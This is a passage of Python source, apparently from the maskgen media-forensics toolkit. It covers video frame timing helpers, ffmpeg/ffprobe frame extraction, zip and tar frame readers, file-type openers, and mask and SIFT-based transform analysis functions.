if self.stopTimeandFrame:
if self.milliNow > self.stopTimeandFrame[0]:
self.frameCountSinceStop += frames
if self.frameCountSinceStop >= self.stopTimeandFrame[1]:
self.frameCountWhenStopped = self.frameSinceBeginning
self.reachedEnd = True
if not self.pastEndTime and self.frameCountSinceStop > self.stopTimeandFrame[1]:
self.pastEndTime = True
self.frameCountWhenStopped = self.frameSinceBeginning - 1
if self.startTimeandFrame:
if self.milliNow > self.startTimeandFrame[0]:
self.frameCountSinceStart += frames
if self.frameCountSinceStart >= self.startTimeandFrame[1]:
if self.beforeStartTime:
self.frameCountWhenStarted = self.frameSinceBeginning
self.beforeStartTime = False
def setStopFrame(self, frame):
if self.stopTimeandFrame is not None and self.stopTimeandFrame[0] > 0:
self.frameCountSinceStop = self.frameSinceBeginning
self.stopTimeandFrame = (0,frame)
def isOpenEnded(self):
return self.stopTimeandFrame is None
def isEnd(self):
return self.reachedEnd
def isPastTime(self):
return self.pastEndTime
def isPastStartTime(self):
return self.startTimeandFrame and self.milliNow > self.startTimeandFrame[0] and \
self.frameCountSinceStart > self.startTimeandFrame[1]
def isBeforeTime(self):
return self.beforeStartTime
def getFrameDurationString(st, et):
"""
calculation duration
"""
try:
stdt = datetime.strptime(st, '%H:%M:%S.%f')
except ValueError:
stdt = datetime.strptime(st, '%H:%M:%S')
try:
etdt = datetime.strptime(et, '%H:%M:%S.%f')
except ValueError:
etdt = datetime.strptime(et, '%H:%M:%S')
delta = etdt - stdt
if delta.days < 0:
return None
sec = delta.seconds
sec += (1 if delta.microseconds > 0 else 0)
hr = sec / 3600
mi = sec / 60 - (hr * 60)
ss = sec - (hr * 3600) - mi * 60
return '{:=02d}:{:=02d}:{:=02d}'.format(hr, mi, ss)
def getSecondDurationStringFromMilliseconds(millis):
sec = int(millis / 1000)
ms = int(millis - (sec * 1000))
return '{:=02d}.{:=03d}'.format(sec, ms)
def getDurationStringFromMilliseconds(millis):
sec = int(millis / 1000)
ms = int((millis - (sec * 1000)) * 1000.0)
hr = sec / 3600
mi = sec / 60 - (hr * 60)
ss = sec - (hr * 3600) - mi * 60
return '{:=02d}:{:=02d}:{:=02d}.{:=06d}'.format(hr, mi, ss, ms)
def addTwo(num_string):
return int(num_string) + 2
def sutractOne(num_string):
return int(num_string) - 1
def addOneFrame(time_string):
time_val = getMilliSecondsAndFrameCount(time_string, defaultValue=(0,0))
return str(time_val[1] + 1)
def subtractOneFrame(time_string):
time_val = getMilliSecondsAndFrameCount(time_string, defaultValue=(0,1))
return str(time_val[1] - 1) if time_val[1] > 1 else '0'
def addFrame(millisAndFrame, frames):
return millisAndFrame[0], millisAndFrame[1] + frames
def differenceBetweenFrame(mandf1, mandf2, rate):
timediff = mandf1[0] - mandf2[0]
frames = int(timediff*rate/1000.0)
return frames + (mandf1[1] - mandf2[1])
def differenceBetweeMillisecondsAndFrame(mandf1, mandf2, rate):
return mandf1[0] - mandf2[0] + (rate * (mandf1[1] - mandf2[1]))
def differenceInFramesBetweenMillisecondsAndFrame(mandf1, mandf2, rate):
return (mandf1[0] - mandf2[0]) / 1000.0 / rate + mandf1[1] - mandf2[1]
def getMilliSeconds(v):
if v is None:
return None, 0
if type(v) in [int,float]:
return v
dt = None
coloncount = v.count(':')
if coloncount == 0:
return int(float(v) * 1000.0)
try:
if '.' in v and len(v) > 15:
v = v[:15]
dt = datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
dt = datetime.strptime(v, '%H:%M:%S')
except ValueError:
return None
millis = dt.hour * 360000 + dt.minute * 60000 + dt.second * 1000 + dt.microsecond / 1000
return millis
def getMilliSecondsAndFrameCount(v, rate=None, defaultValue=None):
if v is None:
return defaultValue
if type(v) == int:
return (float(v) / rate * 1000, 0) if rate is not None else (0, 1 if v == 0 else v)
frame_count = 0
coloncount = v.count(':')
if coloncount > 2:
try:
frame_count = int(v[v.rfind(':') + 1:])
v = v[0:v.rfind(':')]
except:
return defaultValue
elif coloncount == 0:
return (float(v) / rate * 1000.0, 0) if rate is not None else (0, 1 if v == 0 else int(v))
try:
if '.' in v and len(v) > 15:
v = v[:15]
dt = datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
dt = datetime.strptime(v, '%H:%M:%S')
except ValueError:
return defaultValue
millis = dt.hour * 360000 + dt.minute * 60000 + dt.second * 1000 + dt.microsecond / 1000
if rate is not None:
millis += float(frame_count) / rate * 1000.0
frame_count = 0
return (millis, frame_count) if (millis, frame_count) != (0, 0) else (0, 1)
def validateTimeString(v):
if type(v) == int:
return True
if v.count(':') > 2:
return False
if v.count(':') == 0:
try:
int(v)
except:
return False
return True
try:
datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
datetime.strptime(v, '%H:%M:%S')
except ValueError:
return False
return True
def validateAndConvertTypedValue(argName, argValue, operationDef, skipFileValidation=True):
"""
Validate a typed operation argument
return the type converted argument if necessary
raise a ValueError if invalid
"""
if not argValue or len(str(argValue)) == 0:
raise ValueError(argName + ' cannot be an empty string')
argDef = operationDef.optionalparameters[argName] if argName in operationDef.optionalparameters else None
argDef = operationDef.mandatoryparameters[
argName] if not argDef and argName in operationDef.mandatoryparameters else argDef
if argDef:
if argDef['type'] == 'imagefile':
if not os.path.exists(argValue) and not skipFileValidation:
raise ValueError(argName + ' is an invalid file')
elif argDef['type'].startswith('float'):
typeDef = argDef['type']
vals = [float(x) for x in typeDef[typeDef.rfind('[') + 1:-1].split(':')]
if float(argValue) < vals[0] or float(argValue) > vals[1]:
raise ValueError(argName + ' is not within the defined range')
return float(argValue)
elif argDef['type'].startswith('int'):
typeDef = argDef['type']
_match = re.search(r"\[(.*?)\]", typeDef).group(1)
vals = [int(x) for x in _match.split(':')]
if int(argValue) < vals[0] or int(argValue) > vals[1]:
raise ValueError(argName + ' is not within the defined range')
return int(argValue)
elif argDef['type'] == 'list':
if argValue not in argDef['values']:
raise ValueError(argValue + ' is not one of the allowed values')
elif argDef['type'] in ('frame_or_time', 'time'):
if not validateTimeString(argValue):
raise ValueError(argValue + ' is not a valid time (e.g. HH:MM:SS.micro)')
elif argDef['type'] == 'yesno':
if argValue.lower() not in ['yes', 'no']:
raise ValueError(argName + ' is not yes or no')
elif argDef['type'] == 'coorindates':
if not validateCoordinates(argValue):
raise ValueError(argName + ' is not a valid coordinate (e.g. (6,4)')
return argValue
def _processFileMeta(stream):
streams = []
if stream is None:
return streams
for line in stream.splitlines():
if line is None or len(line) == 0:
break
if 'Stream' in line:
if 'Audio' in line:
streams.append('audio')
if 'Video' in line:
streams.append('video')
return streams
def getFileMeta(filename):
ffmpegcommand = os.getenv('MASKGEN_FFPROBETOOL', 'ffprobe')
try:
stdout, stderr = Popen([ffmpegcommand, filename], stdout=PIPE, stderr=PIPE).communicate()
if stderr is not None:
meta = _processFileMeta(stderr)
if stdout is not None:
meta.extend(_processFileMeta(stdout))
return meta
except Exception as e:
logging.getLogger('maskgen').error('FFMPEG error (is it installed?): ' + str(e))
return {}
def millisec2time(milliseconds):
''' Convert milliseconds to 'HH:MM:SS.FFF' '''
s, ms = divmod(milliseconds, 1000)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
if ms > 0:
pattern = r'%02d:%02d:%02d.%03d'
return pattern % (h, m, s, ms)
else:
pattern = r'%02d:%02d:%02d'
return pattern % (h, m, s)
def outputVideoFrame(filename, outputName=None, videoFrameTime=None, isMask=False):
import os
ffcommand = os.getenv('MASKGEN_FFMPEG', 'ffmpeg')
if outputName is not None:
outfilename = outputName
else:
outfilename = os.path.splitext(filename)[0] + '.png'
command = [ffcommand, '-i', filename]
if videoFrameTime is not None:
st = videoFrameTime[0] + 30 * videoFrameTime[1]
command.extend(['-ss', millisec2time(st)])
command.extend(['-vframes', '1', outfilename])
try:
p = Popen(command, stdout=PIPE, stderr=PIPE)
p.communicate()
p.wait()
except OSError as e:
logging.getLogger('maskgen').error("FFmpeg not installed")
logging.getLogger('maskgen').error(str(e))
raise e
return openImage(outfilename, isMask=isMask)
class ZipWriter:
def __init__(self, filename, fps=30):
from zipfile import ZipFile
postfix = filename[filename.rfind('.'):]
self.filename = filename + ('.zip' if postfix not in ['.tgz','.zip'] else '')
self.myzip = ZipFile(self.filename, 'w')
self.count = 0
self.fps = fps
self.prefix = os.path.basename(os.path.splitext(self.filename)[0])
#self.names = []
def isOpened(self):
#TODO: check names, what else
return True
def get(self,prop):
if prop == cv2api.cv2api_delegate.prop_fps:
return self.fps
if prop == cv2api.cv2api_delegate.prop_frame_count:
return self.count
if prop == cv2api.cv2api_delegate.prop_pos_msec:
return self.count * self.fps
def write(self, frame):
fname = "{}_{}.png".format(self.prefix, self.count)
ImageWrapper(frame,filename=fname).save(fname)
self.myzip.write(fname,fname)
self.count+=1
os.remove(fname)
def release(self):
fn = 'meta.csv'
with open(fn,'w') as fp:
fp.write('fram_rate,{}\n'.format(self.fps))
self.myzip.write(fn, fn)
os.remove('meta.csv')
self.myzip.close()
class ZipCapture:
def __init__(self, filename, fps=30, filetypes=imagefiletypes):
from zipfile import ZipFile
import uuid
self.filename = filename
self.myzip = ZipFile(filename, 'r')
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
self.fps = fps
self.count = 0
self.dir = os.path.join(os.path.dirname(os.path.abspath(self.filename)) , uuid.uuid4().__str__())
os.mkdir(self.dir)
if 'meta.csv' in self.myzip.namelist():
self.loadMeta()
self.names = [name for name in self.myzip.namelist() if len(file_type_matcher.findall(name.lower())) > 0 and \
os.path.basename(name) == name]
self.exif = None
def loadMeta(self):
self.meta = {}
if 'meta.csv' in self.myzip.namelist():
fn = self._extract_name('meta.csv')
with open(fn,mode='r') as fp:
for line in fp.readlines():
parts = line.split(',')
self.meta[parts[0].lower().strip()] = ','.join(parts[1:])
self.fps = self.fps if 'frame_rate' not in self.meta else float(self.meta['frame_rate'])
def get_size(self):
return len(self.names)
def isOpened(self):
#TODO: check names, what else
return True
def _extract_name(self,name):
extracted_file = os.path.join(self.dir, name)
if not os.path.exists(extracted_file):
extracted_file = self.myzip.extract(name, self.dir)
return extracted_file
def get(self,prop):
if prop == cv2api.cv2api_delegate.prop_fps:
return self.fps
if prop == cv2api.cv2api_delegate.prop_frame_count:
return self.get_size()
if prop == cv2api.cv2api_delegate.prop_pos_msec:
return self.count* 1000.0/self.fps
exif = self.get_exif()
if prop == cv2api.cv2api_delegate.prop_frame_height:
return getExifDimensionsFromData(exif)[0][0]
if prop == cv2api.cv2api_delegate.prop_frame_width:
return getExifDimensionsFromData(exif)[0][1]
def grab(self):
self.count+=1
return self.count <= len(self.names)
def get_exif(self):
if self.exif is None:
name = self.names[min(len(self.names)-1,max(0, self.count - 1))]
extracted_file = self._extract_name (name)
self.exif = exif.getexif(extracted_file)
return self.exif
def retrieve(self):
if self.count > len(self.names):
return False, None
name = self.names[self.count-1]
extracted_file = self._extract_name (name)
return True, openImage(extracted_file, isMask=False).to_array()
def set_to_end(self):
self.count = len(self.names)
def retrieve_file(self):
if self.count > len(self.names):
return None
name = self.names[self.count-1]
extracted_file = self._extract_name (name)
return extracted_file
def read(self):
self.grab()
return self.retrieve()
def release(self):
import shutil
if self.dir is not None:
shutil.rmtree(self.dir)
self.myzip.close()
self.dir = None
def readFromZip(filename, filetypes=imagefiletypes, videoFrameTime=None, isMask=False, snapshotFileName=None, fps=30):
from zipfile import ZipFile
import re
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
with ZipFile(filename, 'r') as myzip:
names = myzip.namelist()
names.sort()
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
i = 0
for name in names:
i += 1
elapsed_time = i * fps
if len(file_type_matcher.findall(name.lower())) == 0:
continue
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime() or videoFrameTime is None:
break
extracted_file = myzip.extract(name, os.path.dirname(os.path.abspath(filename)))
img = openImage(extracted_file, isMask=isMask)
if extracted_file != snapshotFileName and snapshotFileName is not None:
img.save(snapshotFileName)
return img
def readFromArchive(filename, filetypes=imagefiletypes, videoFrameTime=None, isMask=False, snapshotFileName=None, fps=30):
import tarfile
import re
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
archive = tarfile.open(filename, "w:gz")
try:
names = archive.getnames()
names.sort()
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
i = 0
for name in names:
i += 1
elapsed_time = i * fps
if len(file_type_matcher.findall(name.lower())) == 0:
continue
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime() or videoFrameTime is None:
break
if names:
extracted_file = archive.extract(name, os.path.dirname(os.path.abspath(filename)))
img = openImage(extracted_file, isMask=isMask)
else:
extracted_file =''
img = openImage('')
if extracted_file != snapshotFileName and snapshotFileName is not None:
img.save(snapshotFileName)
return img
finally:
archive.close()
def readImageFromVideo(filename, videoFrameTime=None, isMask=False, snapshotFileName=None):
cap = cv2api.cv2api_delegate.videoCapture(filename, useFFMPEGForTime=False)
bestSoFar = None
bestVariance = -1
maxTry = 20
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
try:
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame = frame[..., ::-1]
elapsed_time = cap.get(cv2api.cv2api_delegate.prop_pos_msec)
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime():
bestSoFar = frame
break
varianceOfImage = math.sqrt(ndimage.measurements.variance(frame))
if frame is not None and bestVariance < varianceOfImage:
bestSoFar = frame
bestVariance = varianceOfImage
maxTry -= 1
if not videoFrameTime and maxTry <= 0:
break
finally:
cap.release()
if bestSoFar is None:
logging.getLogger('maskgen').error(
"{} cannot be read by OpenCV/ffmpeg. Mask generation will not function properly.".format(filename))
return outputVideoFrame(filename, outputName=snapshotFileName, videoFrameTime=videoFrameTime, isMask=isMask)
else:
img = ImageWrapper(bestSoFar, to_mask=isMask)
if snapshotFileName is not None and snapshotFileName != filename:
img.save(snapshotFileName)
return img
def md5_of_file(filename, raiseError=True, load_size=500000000):
import hashlib
import os
try:
size = os.stat(filename).st_size
with open(filename, 'rb') as rp:
if size < load_size:
return hashlib.md5(rp.read()).hexdigest()
else:
m = hashlib.md5()
while True:
b = rp.read(load_size)
if b is not None and len(b) > 0:
m.update(b)
else:
break
return m.hexdigest()
except Exception as e:
if raiseError:
raise e
return ''
def uniqueId():
import time
return str(time.time()).replace('.', '')
def shortenName(name, postfix, identifier=None):
import hashlib
middle = ''.join([(x[0] + x[-1] if len(x) > 1 else x) for x in name.split('_')])
if identifier is not None:
middle = middle + '_' + str(identifier)
return hashlib.md5(name + postfix).hexdigest() + '_' + middle + '_' + postfix
class ImageOpener:
def __init__(self):
pass
def openImage(self, filename, isMask=False, args=None):
try:
img = openImageFile(filename, isMask=isMask, args=args)
return img if img is not None else openImage(get_icon('RedX.png'))
except Exception as e:
logging.getLogger('maskgen').warning('Failed to load ' + filename + ': ' + str(e))
return openImage(get_icon('RedX.png'))
class AudioOpener(ImageOpener):
def __init__(self):
ImageOpener.__init__(self)
def openImage(self, filename, isMask=False, args=None):
return ImageOpener.openImage(self, get_icon('audio.png'))
class VideoOpener(ImageOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
self.videoFrameTime = videoFrameTime
self.preserveSnapshot = preserveSnapshot
ImageOpener.__init__(self)
def openSnapshot(self, filename, snapshotFileName):
return os.path.exists(snapshotFileName) and \
os.stat(snapshotFileName).st_mtime >= os.stat(filename).st_mtime
def openImage(self, filename, isMask=False, args=None):
if not ('video' in getFileMeta(filename)):
return ImageOpener.openImage(self, get_icon('audio.png'))
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readImageFromVideo(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
class ZipOpener(VideoOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
VideoOpener.__init__(self, videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
def openImage(self, filename, isMask=False, args=None):
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readFromZip(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
class CollectionOpener(ImageOpener):
def __init__(self):
ImageOpener.__init__(self)
def openImage(self, filename, isMask=False, args=None):
return ImageOpener.openImage(self, get_icon('zip.jpg'))
class TgzOpener(VideoOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
VideoOpener.__init__(self, videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
def openImage(self, filename, isMask=False, args=None):
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readFromArchive(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
def getContentsOfZip(filename):
from zipfile import ZipFile
with ZipFile(filename, 'r') as inzip:
names = inzip.namelist()
names.sort()
return names
def condenseZip(filename, outputfile=None, filetypes=None, keep=2):
from zipfile import ZipFile
import re
filetypematcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')') \
if filetypes is not None else re.compile('.*')
fn = os.path.splitext(filename)[0] + '_c' + os.path.splitext(filename)[1] if outputfile is None else outputfile
cleanup = []
try:
with ZipFile(fn, 'w') as outzip:
with ZipFile(filename, 'r') as inzip:
names = inzip.namelist()
names.sort()
extensions = {}
for i in range(len(names)):
name = names[i]
extension = os.path.splitext(name)[1]
if len(filetypematcher.findall(name)) == 0:
continue
if extension not in extensions:
extensions[extension] = 1
else:
extensions[extension] += 1
dir = os.path.dirname(os.path.abspath(filename))
extracted_file = os.path.join(dir, name)
cleanup.append(extracted_file)
if extensions[extension] <= keep:
extracted_file = inzip.extract(name, dir)
outzip.write(extracted_file, name)
else:
with open(extracted_file, 'wb') as fp:
fp.flush()
outzip.write(extracted_file, name)
finally:
for filename in cleanup:
if os.path.exists(filename):
os.remove(filename)
def openImage(filename, videoFrameTime=None, isMask=False, preserveSnapshot=False, args=None):
"""
Open and return an image from the file. If the file is a video, find the first non-uniform frame.
videoFrameTime, integer time in milliseconds, is provided, then find the frame after that point in time
preserveSnapshot, False by default, informs the function to save the frame image after extraction for videos
"""
import os
if not os.path.exists(filename):
logging.getLogger('maskgen').warning(filename + ' is missing.')
if not filename.endswith('icons/RedX.png'):
return openImage(get_icon('RedX.png'))
return None
prefix = os.path.splitext(filename)[1][1:].lower()
opener = ImageOpener()
if prefix in ['avi', 'mp4', 'mov', 'flv', 'qt', 'wmv', 'm4p', 'mpeg', 'mpv',
'm4v', 'mts', 'mpg'] or fileType(filename) == 'video':
opener = VideoOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif prefix in ['zip', 'gz']:
if fileType(filename) == 'collection':
opener = CollectionOpener()
else:
opener = ZipOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif prefix in [ 'tgz']:
if fileType(filename) == 'collection':
opener = CollectionOpener()
else:
opener = TgzOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif fileType(filename) == 'audio':
opener = AudioOpener()
return opener.openImage(filename, isMask=isMask, args=args)
def interpolateMask(mask, startIm, destIm, invert=False, arguments=dict()):
"""
:param mask:
:param img1:
:param img2:
:param invert:
:param arguments:
:return:
@type mask: ImageWrapper
@type img2: ImageWrapper
@type img1: ImageWrapper
"""
maskInverted = mask if invert else mask.invert()
mask = np.asarray(mask)
mask = mask.astype('uint8')
logger = logging.getLogger('maskgen')
try:
mask1 = convertToMask(startIm).to_array() if startIm.has_alpha() else None
logger.debug('SIFT')
TM, matchCount = __sift(startIm, destIm, mask1=mask1, mask2=maskInverted, arguments=arguments)
except:
TM = None
if TM is not None:
logger.debug('WARP')
newMask = cv2.warpPerspective(mask, TM, (startIm.size[0], startIm.size[1]), flags=cv2.WARP_INVERSE_MAP,
borderMode=cv2.BORDER_CONSTANT, borderValue=255)
analysis = {}
analysis['transform matrix'] = serializeMatrix(TM)
return newMask, analysis
elif getValue(arguments,'homography','None') != 'None':
logger.debug('SIFT Failed. Find Countours')
try:
contours, hier = cv2api.findContours(255 - mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
minpoint = None
maxpoint = None
for contour in contours:
for point in contour:
if type(point[0]) is np.ndarray:
point = point[0]
if minpoint is None:
minpoint = point
else:
minpoint = (min(minpoint[0], point[0]), min(minpoint[1], point[1]))
if maxpoint is None:
maxpoint = point
else:
maxpoint = (max(maxpoint[0], point[0]), max(maxpoint[1], point[1]))
w = maxpoint[0] - minpoint[0] + 1
h = maxpoint[1] - minpoint[1] + 1
x = minpoint[0]
y = minpoint[1]
if (startIm.size[0] - w) == 0 and (startIm.size[1] - h) == 0:
return mask[y:y + h, x:x + w], {}
except:
return None, None
return None, None
def serializeMatrix(m):
if m is None:
return None
data = {'r': m.shape[0],'c':m.shape[1]}
for r in range(m.shape[0]):
data['r' + str(r)] = list(m[r, :])
return data
def deserializeMatrix(data):
if data is None:
return None
m = np.zeros((int(data['r']), int(data['c'])))
for r in range(m.shape[0]):
m[r, :] = data['r' + str(r)]
return m
def redistribute_intensity(edge_map):
"""
Produce a intensity_map that redistributes the intensity values found in the edge_map evenly over 1 to 255
:param edge_map contains a map between an edge identifier (s,e) and an intensity value from 1 to 255 and possibly a color
:return map of intensity value from edge map to a replacement intensity value
@type edge_map {(str,str): (int,[])}
"""
levels = [x[0] for x in edge_map.values()]
colors = [str(x[1]) for x in edge_map.values() if x[1] is not None]
unique_colors = sorted(np.unique(colors))
intensities = sorted(np.unique(levels))
intensity_map = [0]
if len(unique_colors) == len(intensities):
for x in edge_map.values():
intensity_map[x[0]] = x[1]
return intensity_map
increment = int(16777216 / (len(intensities) + 1))
for pos in range(len(intensities)):
v = (pos + 1) * increment
intensity_map.append([(v % 65536) / 256, v / 65536, (v % 65536) % 256])
for k, v in edge_map.iteritems():
edge_map[k] = (v[0], intensity_map[v[0]])
#im = np.zeros((500,500,3)).astype('uint8')
#pos = 0
#for i in intensity_map:
# im[pos,:] = i
# pos+=1
#ImageWrapper(im).save('foo.png')
return intensity_map
def maskToColorArray(img, color=[0, 0, 0]):
"""
Create a new image setting all white to the color and all black to white.
:param img:
:param color:
:return:
@type img: ImageWrapper
@rtype ImageWrapper
"""
imarray = np.asarray(img)
rgb = np.ones((imarray.shape[0], imarray.shape[1], 3)).astype('uint8') * 255
rgb[imarray == 0, :] = color
return rgb
def toColor(img, intensity_map={}):
"""
Produce an image that changes gray scale to color.
First, set the intensity values of each pixel using the intensity value from the intensity map
Then use a color map to build a color image
Then repopulate the edge_map with the assigned color for each edge
:param img gray scale image
:param intensity_map intensity value mapped to its replacement
:return the new color image
"""
result = cv2.applyColorMap(img.astype('uint8'), cv2.COLORMAP_HSV)
for old, new in intensity_map.iteritems():
result[img == old] = new
result[img == 0] = [255, 255, 255]
return result
def toComposite(img):
"""
Convert to a mask with white indicating change
:param img gray scale image
:return image
"""
result = np.zeros(img.shape).astype('uint8')
result[img > 0] = 255
return result
def toIntTuple(tupleString):
import re
if tupleString is not None and tupleString.find(',') > 0:
return tuple([int(re.sub('[()L]', '', x)) for x in tupleString.split(',')])
return 0, 0
def sizeOfChange(mask):
if len(mask.shape) == 2:
return mask.size - sumMask(mask == 255)
else:
mask_size = mask.shape[0] * mask.shape[1]
return mask_size - sumMask(np.all(mask == [255, 255, 255], axis=2))
def maskChangeAnalysis(mask, globalAnalysis=False):
mask = np.asarray(mask)
totalPossible = reduce(lambda a, x: a * x, mask.shape)
totalChange = sumMask(mask.astype('float32')) / 255.0
ratio = float(totalChange) / float(totalPossible)
globalchange = True
if globalAnalysis:
globalchange = ratio > 0.75
(x, y), (w, h) = boundingRegion(mask)
area = float(w*h)
region = mask[x:x+w,y:y+w]
np.diff(np.where(region > 0)[1])
xhist = np.histogram(np.where(region > 0)[0],bins=min(256,region.shape[0]))[0]
yhist = np.histogram(np.where(region > 0)[0],bins=min(256,region.shape[1]))[0]
dispersion = xhist[0] > 0 and xhist[-1] > 0 and yhist[0] > 0 and yhist[-1] > 0
globalchange |= (area/totalPossible > 0.75) and dispersion
return globalchange, 'small' if totalChange < 2500 else ('medium' if totalChange < 10000 else 'large'), ratio
def SSIMAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
globalchange = img1.size != img2.size
img1, img2 = __alignChannels(img1, img2)
analysis['ssim'] = compare_ssim(np.asarray(img1), np.asarray(img2), multichannel=False),
if mask is not None:
mask = np.copy(np.asarray(mask))
mask[mask > 0] = 1
analysis['local ssim'] = ssim(img1 * mask, img2 * mask, mask, R=65536)
return globalchange
def globalTransformAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
"""
Determine if operation is global. Capture 'change size ratio' and 'change size category'.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
globalchange = img1.size != img2.size
totalChange = ''
ratio = 1.0
if mask is not None:
globalchange, totalChange, ratio = maskChangeAnalysis(mask, not globalchange)
analysis['global'] = arguments['global operation'] if 'global operation' in arguments else \
('yes' if globalchange else 'no')
analysis['change size ratio'] = ratio
analysis['change size category'] = totalChange
return globalchange
def localTransformAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
"""
Non-global operations, capturing 'change size ratio' and 'change size category'.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
globalchange = globalTransformAnalysis(analysis, img1, img2,
mask=mask,
linktype=linktype,
arguments=arguments,
directory=directory)
analysis['global'] = 'no'
return globalchange
def forcedSiftWithInputAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status, using an input mask from the parameters
to select the source region.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments: parameters
:return:
"""
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
if 'inputmaskname' in arguments:
inputmask = openImageFile(os.path.join(directory, arguments['inputmaskname'])).to_mask().to_array()
# a bit arbitrary. If there is a less than 50% overlap, then isolate the regions highlighted by the inputmask
# otherwise just use the change mask for the transform. The change mask should be the full set of the pixels
# changed and the input mask a subset of those pixels
if sumMask(abs((mask.image_array - inputmask) / 255)) / float(sumMask(mask.image_array / 255)) >= 0.75:
# want mask2 to be the region moved to
mask2 = mask - inputmask
# mask1 to be the region moved from
mask = inputmask
else:
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
else:
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def forcedSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:return:
"""
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def seamAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status. If neighbor mask is is constructed, indicating the seams
can be calculated, then mark as not Global.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
forcedSiftAnalysis(analysis, img1, img2, mask=mask, linktype=linktype, arguments=arguments, directory=directory)
if 'neighbor mask' in arguments:
analysis['global'] = 'no'
def rotateSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
If the image is rotated by values other than factors of 90 degrees, use SIFT to build a homography.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
import copy
rot = float(getValue(arguments,'rotation',-1))
is_local = getValue(arguments,'local',True)
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if abs(rot % 90)<0.001 and not is_local:
return
if is_local:
return siftAnalysis(analysis, img1, img2, mask=mask, linktype=linktype, arguments=arguments, directory=directory)
# global case and not a factor of 90
# skip video
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
serializedMatrix = getValue(arguments,'transform matrix')
if serializedMatrix is None:
args = copy.copy(arguments)
(x,y),(w,h) = boundingRegion(mask.invert().image_array)
